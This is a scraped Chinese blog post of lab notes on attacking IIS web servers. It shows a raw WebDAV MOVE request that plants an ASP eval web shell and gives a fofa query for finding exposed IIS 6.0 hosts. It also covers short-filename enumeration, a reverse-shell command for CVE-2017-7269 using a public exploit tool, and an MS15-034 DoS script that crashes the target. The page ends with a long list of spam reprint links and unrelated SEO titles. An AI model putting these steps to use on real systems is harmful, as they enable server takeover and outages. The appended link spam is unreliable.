当前位置: 首页 > wzjs >正文

网站建设是前端后端吗关键词优化需要注意

网站建设是前端后端吗,关键词优化需要注意,网站名称价格,滨州淘宝网站建设中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实…

中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。    

 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实现应⽤程序开发者不必为更多系统问题忧虑,⽽直接关注该应⽤程序在解决问题上的能⼒ 。容器就是中间件的⼀种。

也就是说,关于中间件,我们可以理解为:是⼀类能够为⼀种或多种应⽤程序合作互通、资源共享,同时还能够为该应⽤程序提供相关的服务的软件。(注意:中间件是⼀类软件的总称,不是单独的⼀个软件)。

IIS(IIS6.x)

PUT漏洞

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

环境

fofa:"IIS-6.0"

本地搭建2003 server

开启 WebDAV 和写权限

打开网址,直接抓包 

 发送重放器,修改代码

MOVE /1.txt HTTP/1.1
Host:192.168.80.132
Destination:http://192.168.80.132/shell.asp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 25

<%eval request("cmd")%>

发送后生成shell.jsp 

 可以使用http://192.168.80.132/shell.asp访问

使用菜⼑,蚁剑连接即可

IIS短⽂件漏洞

开启IIS6.0 ASP.NET

Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以允许基于 MS-DOS 或 16位 Windows的程序访问这些⽂件。在cmd下输⼊"dir /x"即可看到短⽂件名的效果

 

创建1223213113.txt 

 

访问:http://upload.moonteam.com/*~1*/a.asp   开始尝试

之后一位一位试就可以了 ,出现无法找到该页,为正确

尝试后缀名

​​ 之后一位一位试就可以了 ,出现无法找到该页,为正确

IIS RCE-CVE-2017-7269

Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执⾏任意代码 PROPFIND请求

WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。

利⽤⼯具

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

 反弹shell

将工具放到kali

python2 '/home/kali/Desktop/iis6 reverse shell' 192.168.80.132 80 192.168.80.129 6666

IIS   (llS7.x)

HTTP.SYS远程代码执⾏(MS15-034)  MS-->Microsoft 2015 -034

HTTP SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引 ⼊,IIS服务进程依赖HTTP.SY

HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞。

环境

windows server 2012 IIS8.5

在主页面右击,点击复制图片链接(后面用)

 使用工具

下载: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

 python IISDoS.py  

 返回window后出现蓝屏

 


文章转载自:

http://n0CyE5Bm.zqbrw.cn
http://7t4hn9l5.zqbrw.cn
http://seMpNCOs.zqbrw.cn
http://hplaWWDn.zqbrw.cn
http://s8ZVJZc5.zqbrw.cn
http://uXPKNWJW.zqbrw.cn
http://c8MHEb9H.zqbrw.cn
http://QSwB9lkV.zqbrw.cn
http://266NdsbS.zqbrw.cn
http://I0z53Rq0.zqbrw.cn
http://8FSxrMFh.zqbrw.cn
http://ZGbJgw4l.zqbrw.cn
http://9HjVqzF5.zqbrw.cn
http://6bla78TL.zqbrw.cn
http://so3gdiKk.zqbrw.cn
http://2cq9xUAB.zqbrw.cn
http://Kmq94q2X.zqbrw.cn
http://tGt5wHnY.zqbrw.cn
http://8HEGy8gL.zqbrw.cn
http://4fPLtmfC.zqbrw.cn
http://s0dbAV1v.zqbrw.cn
http://a8L35HzW.zqbrw.cn
http://TnDEFAti.zqbrw.cn
http://zPm9kFJl.zqbrw.cn
http://VgJvxY9Z.zqbrw.cn
http://YAqX1NON.zqbrw.cn
http://Wgzv11Tb.zqbrw.cn
http://COjMouNH.zqbrw.cn
http://R6E8zTtg.zqbrw.cn
http://Wr57LIol.zqbrw.cn
http://www.dtcms.com/wzjs/611930.html

相关文章:

  • wordpress不要在前端显示标签西宁网站建设优化
  • 网上花钱做ppt的网站做简单的网站
  • 怎样做企业网站建设ftp制作网站
  • 网站建设公司怎么推广优化大师最新版本
  • 国内网站如何做流量免费做微信小程序
  • 怀化平台济南网站建设优化
  • 一键建站免费如何做天猫网站
  • 服饰网站建设模板易语言建设网站
  • 扬州住房与城乡建设局网站做网盟行业网站的图片广告的销售
  • 中国建设银行网站企业网银收费长春企业网站制作优化
  • 专门做评测的网站中企动力做的网站价格区间
  • 建设外贸网站哪家好wordpress构建自定义设置页面
  • 简单的工作室网站模板seo静态页源码
  • 网站设计方案案例分析建筑行业资讯网站
  • 哪里有响应式网站企业企业只有建立自己的网站
  • 克拉玛依建设局网站eclipse网站开发实例
  • 慕课联盟网站开发实战越秀金融大厦地址
  • 网站建设的考虑网店装修素材
  • 淘宝网站店铺请人做柳州网站建站费用
  • 常州网站建设技术托管遵义今天查出新冠
  • 网站 工作室前台和后台网站开发的区别
  • app展示网站模板网站选项卡代码
  • 网站快速排名方法织梦做的网站首页打不开
  • 部门网站的开发 意义wordpress要钱吗
  • 织梦 网站地图 样式昔阳做网站公司
  • 表格如何给网站做链接地址wordpress编辑器移植
  • 营销型网站的建设软文制作网页
  • 高端网站建设公司哪家更专业男的女的做那个视频网站
  • 做短袖的网站做品牌网站的
  • 做设计找素材的 网站有哪些教做美食的网站